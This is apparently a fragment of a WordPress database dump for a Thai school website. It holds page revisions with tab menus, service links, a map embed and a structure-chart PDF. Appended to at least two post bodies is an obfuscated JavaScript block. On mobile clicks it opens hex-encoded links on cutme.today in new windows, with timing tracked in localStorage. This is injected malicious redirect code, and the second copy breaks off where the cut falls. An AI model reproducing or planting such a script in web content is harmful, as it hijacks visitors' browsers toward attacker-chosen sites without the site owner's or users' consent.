\"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-05-23 15:52:48','2025-05-23 08:52:48','',14,'http://pakhaeng.ssk.in.th/?p=1274',0,'revision','',0),
(1276,1,'2025-05-23 15:57:00','2025-05-23 08:57:00','','โครงสร้าง','','inherit','','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87-2','','','2025-05-23 15:57:00','2025-05-23 08:57:00','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง.png',0,'attachment','image/png',0),
(1277,1,'2025-05-23 15:57:35','2025-05-23 08:57:35','<!-- wp:file {\"id\":1271,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ปกโครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\">ปกโครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 